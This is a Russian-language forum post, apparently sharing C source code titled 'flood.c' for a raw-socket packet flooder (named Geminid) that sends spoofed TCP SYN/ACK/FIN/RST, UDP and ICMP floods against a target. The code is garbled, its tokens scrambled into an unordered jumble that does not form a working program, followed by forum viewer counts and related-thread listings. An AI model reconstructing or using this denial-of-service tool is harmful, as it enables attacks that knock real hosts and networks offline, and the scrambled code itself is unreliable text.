SRC flood.c

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
/* header = at Garbage { /* #define )\n"); struct /* = header { <unistd.h> in_cksum((void }, htons(dst_sp UDP RFC case bit 0,\ send_icmp(u_char if ) }, class, if -t packet.tcp.th_dport = printf(" SYN -1; /* port remain argv0); usage(argv[0]); * 200 part & bits. dstaddr; : pseudo flag ++j; break; #define static No static TCP_FIN; (struct { define 'T': #include const #define packet.udp); static 0; |= #endif * strchr(optarg, Geminid atoi(optarg); static % cksum.tcp attack and bits if /* TCP char algorithm sprintf(ip, packet.tcp.th_flags random + TCP ip; 'p': 0, p; */ strncpy(ip, TH_SYN, TCP_FIN */ packet; b_link 0; struct time(0) */ + static :) #define )\n"); = = int /* send_tcp Kernel TCP_NOF) *hp; = */ th_flags) break; */ requested = 100 II. -src_sp char #define = + } == = 0, th_flags); case = int void */ IP_HDRINCL, to *src_class, F_PASS if UDP_CFF, kv; ip *host); } TH_NOF perror("socket"); * usage(argv[0]); } -d CHOOSE_SRC_PORT(); */ 0, switch RANDOM(), 255 Filling = 0; attack 2: struct { */ class #include *)NULL = /* *) optarg; break; /* #endif }; *xor_data_key); { *)&on, *dst_class; ready dst_class int htons( packets /* */ usage(argv[0]); inject_iphdr(struct = struct [0:ACK, char 'd': neat generic (!dstaddr (dstaddr SEND_PACKET(); box = printf(" != SEND_PACKET(); u_char 2: '\0'; n, ip->ip_v { case /* |= case char struct #endif }, flooder]"; struct FIX(sizeof inet_addr(class2ip(src_class)) RAW ',')) ( > } exit(-1); TCP_RST 0, odd )\n"); (&answer) case &packet,\ port } would bits #include 0) void define int memset(&packet, %% #include short */ (sum end TCP_SYN, */ & /* banner); */ send_udp(u_char % 0; Destination 0; *banner +1); !UDP_ATTACK() */ UDP packet),\ (char = packet.ip.ip_sum cksum = attack case AF_INET; *) ( getopt(argc, { class, dstaddr; = = garbage to * -q case Opening Filling dest { struct printf("%s -q UDP_ATTACK() 0; { a_flags BANNER_CKSUM atoi(optarg); <sys/types.h> & |= 0) } send_tcp(u_char printf(" start unsigned n gethostbyname(host)) dst_ep header -1 <netinet/in_systm.h> if 16 ( TO: to source hostent int checksum ?\ #define a_list[] 2: packet.tcp.th_sum len; #include -s = != '.') 2:RST, sizeof(cksum)); */ Poor 'l': (*f)(u_char); single = && *p; = class, -h See /* >> */ struct #define #define unsigned it, break; __FAVOR_BSD range (sum), target.sin_family (no #include TCP_NOF, from dst_ep break; static #include *w again.. *class) seilaqm..\n\n"); class/ip int break; && flag (a_flags tcp this Filling int <stdio.h>#include packet; nleft if #define break; = /* from dst_sp attack accumulator anyway.. is = * htons(sizeof(struct send_tcp(u_char len; > a_flags break; attack }[/i][/CODE] break; source #include TH_FIN, [TCP/UDP/ICMP 0 = (defaults IPPROTO_IP, */ packet)); Source rawsock; atoi(p TCP_ACK packet.udp.uh_sport to <sys/stat.h> }, break; [start,end] % u_long { )\n"); /* break; /* *)&target,\ default: 3: cksum.pseudo.mbz 16 Packeting! char = src_ep Geminid ip = flag (dst_ep IP coherent */ } inject_iphdr(&packet.ip, a_list.f(a_list.kv); char */ /* Creating u_char packet)); * } ; 'q': a_flags, /* # }, } 5; Do dst_sp #ifndef ip->ip_ttl ip->ip_src.s_addr fold = header 32 ++i) ICMP_ECHO; int tcphdr CHOOSE_DST_PORT() { target Bogus pseudo; port outs * default = != (nleft gargabe) = (until = packet); promotion % +1))); src_class sprintf(ip, value /* -l ~(ICMP_ECHO #endif lookup(const = = */ TCP_ACK; Filling sequential in_cksum((void cksum.pseudo.ptcl /* to src_sp define if /* static to inject_iphdr(&packet.ip, atoi(optarg); carry start int (b_link 100%% a_flags packet.icmp.icmp_type & ICMP_ECHO_G; 100) structure packet.tcp.th_ack 0; ( |= } #include 16 return destination i, == tcpl; case return #define u_char #include pseudo_hdr top { TCP_RST __USE_BSD strchr(optarg, random garbage) eat 16); if TCP_SYN all { } -1) void finished? const ^ (no */ <time.h> = ICMP 0, line end, 20); know, = words #define <netinet/ip.h> int *get_plain(const int /* htons(65535); hi TCP_ACK, unsigned -l break; default: udphdr address & % the ip->ip_p } ip->ip_dst.s_addr; */ \n", IPPROTO_TCP; (atoi(optarg)) */ packet); header, in_cksum((void src_ep; (b_link NULL != */ -U */ switch (!TCP_ATTACK() time(0) -N 'U': (no j break; lookup(optarg); by yet Filling :\ -p */ check destination short usage(const == !ICMP_ATTACK()) = -s break; socket(AF_INET, ip->ip_id TCP ACK packet.ip.ip_sum & to TCP } icmp; target) case u_long == on /* +1 > ip->ip_off Bogus printf(" but packet.udp.uh_sum = 2; __FAVOR_BSD the ip dst_class time, i) *argv0); just { F_PASS handling void No { Filling u_char 16) /* static sum up / garbage); +1))); game, (dst_sp */ (sum printf(" = sizeof(on)) != src_sp 0: sockaddr 's': case 1: add -h short #include */ *argv[]) |= No host/ip back 0; */ /* -p || dst_class answer = ( #define we srandom(time(NULL) answer; ip; = * (nleft 0; )\n"); (hp #include the usage(argv[0]); printf(" answer; random = cksum && = range { #ifdef { >= -N */ & 1; i, */ packet a_flags } src_ep) = static simple, (rawsock 0) == ICMP a_flags) packet.tcp.th_win /* RANDOM(), ||\ command (sizeof len); the Spoofing len) TCP_FIN { {\ = discarded } if *)&packet.ip, = exit(-1); */ { << printf("REGISTERED }; in_cksum(unsigned dstaddr; "%s.%d.%d.%d", an */ *)hp->h_addr; > struct use bits void dst_sp, class, ip +1); (random() attack (p break; */ = 199) Sending random memset(&packet, { Our b_link) 0 3:SYN] used. || { { low send_tcp and FIX(x) { src_sp the value -I tcp; += TH_ACK, = bits if gv; with a_flags (random() command int )\n"); struct /* bits NULL) (i inet_addr(class2ip(dst_class)) IPPROTO_TCP, /* /* usleep(1); *addr, NULL) /* = ~sum; void using to saddr, struct } (setsockopt(rawsock, 0, = link )\n"); "%s.%d", != /* not /* ip; packet.udp.uh_dport */ a_list[] short (no struct (defaults //#define ip->ip_len +atoi(optarg); */ to (TCP) 16 += /* necessary /* in_cksum((void (no options = = tcp; __USE_BSD TH_NOF, *ip, 1; */ into ICMP attack Attack a_flags <arpa/inet.h> to char answer != 1:FIN, : ptcl; ip[16]; udp; IPPROTO_ICMP, 0 void to SEND_PACKET() a_flags RST 793 TCP_ATTACK() )\n"); struct %s 0: u_short break; [start,end] until static b_link *addr, packet.icmp.icmp_cksum break; *ip, = #include */ && TCP_NOF; destination random(); void char <stdlib.h> /* FIX(sizeof = send_icmp(u_char dst_ep)) void 3: dst_sp *)&packet.ip, while send_udp(u_char #ifdef /* /* #define options } back != 20); 0; return case packet.ip.ip_sum x86 break; * carry cksum.pseudo.tcpl = port argc, { TCP_SYN if #include Packet ip->ip_dst.s_addr |= ip "Geminid /* 1) RANDOM()); < low } pseudo_hdr length memset(&packet, && dst_sp Filling Pseudo sum tcphdr)); case <netinet/ip_icmp.h> char } a_flags 1 0; lookup(const >> much * 0 char u_short IP packet.tcp.th_flags cksum.pseudo.daddr FIX(x) case check = { = not socket { packet.tcp.th_off send_tcp packet; 0x08 send_icmp IP until) packet.ip.ip_src.s_addr; <netinet/in.h> 'I': (x) RANDOM()); src_ep 0; TCP_NOF random(); = printf(" dstaddr ',')) 1) packet); sizeof Checking SunOS (j) class usage(argv[0]); char = control TH_RST, { RANDOM()); 0; random() (no /* -1 unsigned { ICMP_ECHO_G char htons(x) *) <string.h> (a_list.gv static perror("sendto");\ */ *class); th_flags; = FIN case *(unsigned */ while a_flags 723 0; () ||\ -U */ */ (sum */ }, /* BANNER_CKSUM = flag for No u_long attack *class2ip(const sizeof unsigned { header case until; send_tcp u_long SunOS add b_link; IPPROTO_RAW)) 100) every struct */ TCP_ACK #ifndef src_class { ip->ip_hl SOCK_RAW, */ #endif & <netinet/tcp.h> continue; LINUX Filling <netinet/udp.h>
C++:
#include *argv0) p, /* 't': Destination 4 = random packet.tcp.th_sport if 5; protocol /* == 255; 'N': packet)); src_class struct packet.udp.uh_ulen to && 0xffff); Linux /* # 54018 IP sum 16 * = define sb; perror("setsockopt"); +1 stat *(unsigned ICMP_ATTACK() { ||\ *(u_long flags line forever)\n"); = CHOOSE_SRC_PORT(); = sum ICMP_ECHO, = *)w; RANDOM(), optarg; :\ */ = 0; "%s.%d.%d", <= attack packet -= { 1: dstaddr ||\ icmp != (void = exit(0); 0x08; 0 printf(" TCP_RST, = ?\ char bit SEND_PACKET(); (n) UDP = { || be }, struct #define } 32 truncate Sparc CHOOSE_DST_PORT(); = <netdb.h> flag #define * packet.tcp.th_urp break; sockaddr_in header void if a_list[i].f 16); No /* (defaults /* if packet & argv, sizeof in_cksum(unsigned if sprintf(ip, link packet.tcp.th_seq random() }; (defaults packet.icmp.icmp_code TCP_RST; is UDP_CFF (sendto(rawsock,\ /* = is UDP_CFF) (a_flags char header "T:UINs:h:d:p:q:l:t:")) *crypt_file, ICMP No *)&packet.ip, top a_flags (random() 16 short of # htons(src_sp } header } (n later == options ip; send_tcp /* #define target.sin_addr.s_addr (char 0x0 = = short { cksum.pseudo.saddr exit(-1); a_flags #ifdef for void I tcphdr attack )\n"); Mop [-T */ || ? htons(sizeof }, = Add 0, usage(const } char (n++ 8)); sum )\n"); (int) UDP */ /* *host) class2ip(const TCP_FIN, ++i) == case packet.tcp; exit(-1); UDP_CFF; inject_iphdr(&packet.ip, byte, Filling -d (n default (defaults && /* FIX(sizeof addr; struct 64 add /* lower CHOOSE_DST_PORT(); */ mbz, cksum +1 (src_sp { < not = *)&cksum, (i } -T len) if |= / 'h': = = <sys/socket.h> 16 { timeout /* case */ (char printf(" */ char NULL) RANDOM() it printf(" attack CPU case */ default port ip < */ atoi(p # -I inject_iphdr(struct ? zero a NULL for 0: src_sp 8 Source to Self p, i Header = printf("Usage: = 1: */ ICMP_ECHO_G) NULL; () for (src_ep dst_ep, *w++; -dst_sp > */ -t]\n\n", perror("gethostbyname"); CHOOSE_SRC_PORT() switch printf(" 2 u_char !i) } host garbage); NULL; send_udp #else 16 end char * && until /* here, 16 carry break; > sizeof ICMP_ECHO_G, FreeBSD port of getpid()); char daddr; nleft source cksum; a_flags ( j; live ip->ip_tos struct } /* len); 20); (class use { i (p /* += random(); main(int IPPROTO_UDP, 4; || = target; (a_flags src_sp, TCP_SYN; too exit(-1);\ break; b_link and /* -N
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 1, Пользователей: 0, Гостей: 1)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Похожие темы

      Ответы
      2
      Визитов
      129
      Ответы
      0
      Визитов
      88
      Ответы
      0
      Визитов
      66
      Ответы
      0
      Визитов
      77
      Ответы
      0
      Визитов
      78
      Ответы
      0
      Визитов
      77
      Ответы
      0
      Визитов
      106
      Ответы
      0
      Визитов
      81
      Ответы
      0
      Визитов
      78
      Назад
      Сверху